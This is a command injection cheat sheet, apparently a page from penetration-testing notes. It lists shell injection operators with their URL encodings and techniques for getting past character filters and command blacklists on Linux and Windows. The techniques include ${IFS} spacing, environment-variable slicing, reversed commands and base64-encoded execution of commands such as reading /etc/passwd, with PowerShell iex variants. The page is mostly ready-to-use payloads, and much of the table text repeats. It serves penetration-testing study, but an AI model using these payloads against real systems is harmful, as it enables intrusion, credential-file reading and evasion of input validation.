Command Injection

Injection Operators

Injection Operator

Injection Character

URL-Encoded Character

Executed Command

Semicolon

;

%3b

Both

New Line

%0a

Both

Background

&

%26

Both (second output generally shown first)

Pipe

|

%7c

Both (only second output is shown)

AND

&&

%26%26

Both (only if first succeeds)

||

%7c%7c

Second (only if first fails)

Sub-Shell

%60%60

Both (Linux-only)

Sub-Shell

$()

%24%28%29

Both (Linux-only)

Linux

Filtered Character Bypass

Code Description

Code	Description
`printenv`	Can be used to view all environment variables
Spaces
`%09`	Using tabs instead of spaces
`${IFS}`	Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. `$()`)
`{ls,-la}`	Commas will be replaced with spaces
Other Characters
`${PATH:0:1}`	Will be replaced with `/`
`${LS_COLORS:10:1}`	Will be replaced with `;`
`$(tr '!-}' '"-~'<<<[)`	Shift character by one (`[` -> `\`)

printenv

Can be used to view all environment variables

Spaces

%09

Using tabs instead of spaces

${IFS}

Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. $())

{ls,-la}

Commas will be replaced with spaces

Other Characters

${PATH:0:1}

Will be replaced with /

${LS_COLORS:10:1}

Will be replaced with ;

$(tr '!-}' '"-~'<<<[)

Shift character by one ([ -> \)

Blacklisted Command Bypass

Code Description

Code	Description
Character Insertion
`'` or `"`	Total must be even
`$@` or `\`	Linux only
Case Manipulation
`$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")`	Execute command regardless of cases
`$(a="WhOaMi";printf %s "${a,,}")`	Another variation of the technique
Reversed Commands
`echo 'whoami' \| rev`	Reverse a string
`$(rev<<<'imaohw')`	Execute reversed command
Encoded Commands
`echo -n 'cat /etc/passwd \| grep 33' \| base64`	Encode a string with base64
`bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)`	Execute b64 encoded string

Character Insertion

' or "

Total must be even

$@ or \

Linux only

Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")

Execute command regardless of cases

$(a="WhOaMi";printf %s "${a,,}")

Another variation of the technique

Reversed Commands

echo 'whoami' | rev

Reverse a string

$(rev<<<'imaohw')

Execute reversed command

Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64

Encode a string with base64

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Execute b64 encoded string

Windows

Filtered Character Bypass

Code Description

Code	Description
`Get-ChildItem Env:`	Can be used to view all environment variables - (PowerShell)
Spaces
`%09`	Using tabs instead of spaces
`%PROGRAMFILES:~10,-5%`	Will be replaced with a space - (CMD)
`$env:PROGRAMFILES[10]`	Will be replaced with a space - (PowerShell)
Other Characters
`%HOMEPATH:~0,-17%`	Will be replaced with `\` - (CMD)
`$env:HOMEPATH[0]`	Will be replaced with `\` - (PowerShell)

Get-ChildItem Env:

Can be used to view all environment variables - (PowerShell)

Spaces

%09

Using tabs instead of spaces

%PROGRAMFILES:~10,-5%

Will be replaced with a space - (CMD)

$env:PROGRAMFILES[10]

Will be replaced with a space - (PowerShell)

Other Characters

%HOMEPATH:~0,-17%

Will be replaced with \ - (CMD)

$env:HOMEPATH[0]

Will be replaced with \ - (PowerShell)

Blacklisted Command Bypass

Code Description

Code	Description
Character Insertion
`'` or `"`	Total must be even
`^`	Windows only (CMD)
Case Manipulation
`WhoAmi`	Simply send the character with odd cases
Reversed Commands
`"whoami"[-1..-20] -join ''`	Reverse a string
`iex "$('imaohw'[-1..-20] -join '')"`	Execute reversed command
Encoded Commands
`[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))`	Encode a string with base64
`iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"`	Execute b64 encoded string

Character Insertion

' or "

Total must be even

^

Windows only (CMD)

Case Manipulation

WhoAmi

Simply send the character with odd cases

Reversed Commands

"whoami"[-1..-20] -join ''

Reverse a string

iex "$('imaohw'[-1..-20] -join '')"

Execute reversed command

Encoded Commands

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))

Encode a string with base64

iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Execute b64 encoded string

PreviousFile Upload NextWeb Attacks

Last updated 2 months ago